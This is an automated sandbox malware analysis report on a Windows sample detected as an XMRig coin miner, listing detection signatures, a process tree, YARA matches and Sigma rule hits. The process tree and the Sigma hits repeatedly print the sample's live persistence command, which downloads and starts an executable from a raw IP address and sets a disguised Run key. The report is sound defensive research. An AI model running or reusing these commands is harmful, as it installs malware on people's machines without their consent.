Windows Analysis Report
1ZXaFij.exe

Overview

General Information

Sample name: 1ZXaFij.exe
Analysis ID: 1627183
MD5: fe93a52fe64767a5ea5d347ade107dee
SHA1: 8a642f7dfdc97360b25b4be5129a44b55e453b59
SHA256: 66cc7ecb9b97788b176b5f8105e47368e8c226b8d9d9bf2496f4b30999da8530
Tags: CoinMiner, exe, user-aachum

Detection

Xmrig
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
Bypasses PowerShell execution policy
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files to the startup folder
Found API chain indicative of sandbox detection
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect sandboxes (foreground window change detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 1ZXaFij.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\1ZXaFij.exe" MD5: FE93A52FE64767A5EA5D347ADE107DEE)
    • cmd.exe (PID: 1652 cmdline: C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7256 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 7696 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 7728 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • powershell.exe (PID: 7880 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8088 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6912 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • runps.exe (PID: 7348 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" MD5: FE93A52FE64767A5EA5D347ADE107DEE)
    • cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7460 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 7712 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 7744 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D6A.tmp" "c:\Users\user\AppData\Local\Temp\CSC95BE416761534B22A9BF915F54099EA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • reg.exe (PID: 7372 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorer.exe (PID: 7188 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • WerFault.exe (PID: 5700 cmdline: C:\Windows\system32\WerFault.exe -u -p 7188 -s 7020 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • explorer.exe (PID: 6148 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • WerFault.exe (PID: 2168 cmdline: C:\Windows\system32\WerFault.exe -u -p 6148 -s 8632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • explorer.exe (PID: 2500 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • WerFault.exe (PID: 3648 cmdline: C:\Windows\system32\WerFault.exe -u -p 2500 -s 7024 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • explorer.exe (PID: 4960 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source / Rule / Description / Author / Strings
Source: dump.pcap, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: dump.pcap, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown
  • 0x1080e7e:$a1: mining.set_target
  • 0x179e27b:$a1: mining.set_target
  • 0x107af1e:$a2: XMRIG_HOSTNAME
  • 0x1798439:$a2: XMRIG_HOSTNAME
  • 0x107d360:$a3: Usage: xmrig [OPTIONS]
  • 0x179a83b:$a3: Usage: xmrig [OPTIONS]
  • 0x107aef6:$a4: XMRIG_VERSION
  • 0x1798411:$a4: XMRIG_VERSION
Source / Rule / Description / Author / Strings
Source: 00000017.00000002.1681510844.0000000010AE0000.00000040.00000001.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown
  • 0x6b2d10:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000017.00000002.1682248849.00000000111A0000.00000040.00000400.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown
  • 0x6b2d10:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000017.00000000.1514869654.00000000111A0000.00000040.00000400.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown
  • 0x6b2d10:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000017.00000000.1543470099.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000017.00000000.1543470099.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown
  • 0x468470:$a1: mining.set_target
  • 0x462e58:$a2: XMRIG_HOSTNAME
  • 0x464f40:$a3: Usage: xmrig [OPTIONS]
  • 0x462e30:$a4: XMRIG_VERSION
Source / Rule / Description / Author / Strings
Source: 23.0.explorer.exe.c000ae0000.14.unpack, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 23.0.explorer.exe.c000ae0000.14.unpack, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown
  • 0x586c70:$a1: mining.set_target
  • 0x581658:$a2: XMRIG_HOSTNAME
  • 0x583740:$a3: Usage: xmrig [OPTIONS]
  • 0x581630:$a4: XMRIG_VERSION
Source: 23.0.explorer.exe.c000ae0000.14.unpack, Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Author: Florian Roth
  • 0x58dce1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: 23.0.explorer.exe.c000ae0000.14.unpack, Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Author: ditekSHen
  • 0x58e1b0:$s1: %s/%s (Windows NT %lu.%lu
  • 0x58f230:$s3: \\.\WinRing0_
  • 0x585938:$s4: pool_wallet

        System Summary

        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4056, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami, ProcessId: 7880, ProcessName: powershell.exe
        Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1652, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ProcessId: 7256, ProcessName: powershell.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 6912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
        Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\1ZXaFij.exe", ParentImage: C:\Users\user\Desktop\1ZXaFij.exe, ParentProcessId: 2848, ParentProcessName: 1ZXaFij.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, ProcessId: 6912, ProcessName: reg.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7256, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", ProcessId: 7696, ProcessName: csc.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\1ZXaFij.exe", ParentImage: C:\Users\user\Desktop\1ZXaFij.exe, ParentProcessId: 2848, ParentProcessName: 1ZXaFij.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, ProcessId: 6912, ProcessName: reg.exe
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\1ZXaFij.exe, ProcessId: 2848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\1ZXaFij.exe", ParentImage: C:\Users\user\Desktop\1ZXaFij.exe, ParentProcessId: 2848, ParentProcessName: 1ZXaFij.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, ProcessId: 6912, ProcessName: reg.exe
        Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 6912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\1ZXaFij.exe", ParentImage: C:\Users\user\Desktop\1ZXaFij.exe, ParentProcessId: 2848, ParentProcessName: 1ZXaFij.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, ProcessId: 6912, ProcessName: reg.exe
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7696, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP", ProcessId: 7728, ProcessName: cvtres.exe
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7256, TargetFilename: C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline
